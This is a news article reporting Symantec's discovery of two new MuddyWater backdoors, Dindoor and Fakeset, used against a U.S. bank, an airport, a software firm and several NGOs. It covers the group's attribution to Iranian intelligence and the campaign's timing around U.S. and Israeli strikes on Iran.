MuddyWater, a hacking group linked to Iranian intelligence services, has infiltrated the networks of a U.S. bank, an airport, and an American software company using two newly discovered backdoors. The operation, identified by Symantec, appears to have intensified following U.S. and Israeli strikes against Iran in late February.
Two New Backdoors Discovered
Symantec’s Threat Hunter team uncovered the campaign. Since early February 2026, the MuddyWater group—also known as Seedworm—has been deploying two previously unknown malware tools.
The first one, Dindoor, uses Deno, a JavaScript runtime environment, and was signed with a certificate issued under the name “Amy Cherne.”
The second, Fakeset, is written in Python and signed by “Donald Gay,” a name previously associated with older MuddyWater tools such as Stagecomp and Darkcomp.
In both cases, the attackers attempted to exfiltrate data to the Wasabi cloud storage service using Rclone, a synchronization tool widely used by system administrators.
Sensitive Targets and a Possible Link to Israel
The victims include a U.S. bank, an airport, a software publisher linked to the defense and aerospace sectors with operations in Israel, as well as several NGOs in the United States and Canada.
According to researchers, MuddyWater had already established a presence inside these networks in early February. However, activity significantly increased after February 28, following the launch of Operation Epic Fury, a series of coordinated military strikes by the United States and Israel against Iran.
The strikes reportedly resulted in the death of Iran’s Supreme Leader Ali Khamenei on March 1, and security researchers observed that Iranian cyber operations accelerated shortly afterward.
FBI Confirms Ties to Tehran
The FBI, CISA, and the UK’s National Cyber Security Centre (NCSC) believe MuddyWater has been operating on behalf of Iran’s Ministry of Intelligence since 2018.
One key factor supporting this attribution is the reuse of digital signing certificates between the newly discovered backdoors and previously known tools used by the group.
The analysis published by Symantec has also been confirmed by Google, Microsoft, and Kaspersky.
As for the exact objective of the intrusions, researchers remain cautious. The campaign could involve espionage, intelligence gathering, or preparation for potential sabotage operations.
MuddyWater typically relies on phishing campaigns and the exploitation of vulnerabilities in internet-facing applications to gain access to targeted networks.
Perhaps the most surprising aspect of the operation is how long the attackers remained undetected—weeks of infiltration within highly sensitive networks without triggering alarms.
Given the current geopolitical tensions between Iran, the United States, and Israel, it is likely that Symantec has only uncovered part of the broader campaign.
And if you'd like to go a step further in supporting us, you can treat us to a virtual coffee ☕️. Thank you for your support ❤️!
We do not support or promote any form of piracy, copyright infringement, or illegal use of software, video content, or digital resources.
Any mention of third-party sites, tools, or platforms is purely for informational purposes. It is the responsibility of each reader to comply with the laws in their country, as well as the terms of use of the services mentioned.
We strongly encourage the use of legal, open-source, or official solutions in a responsible manner.
Comments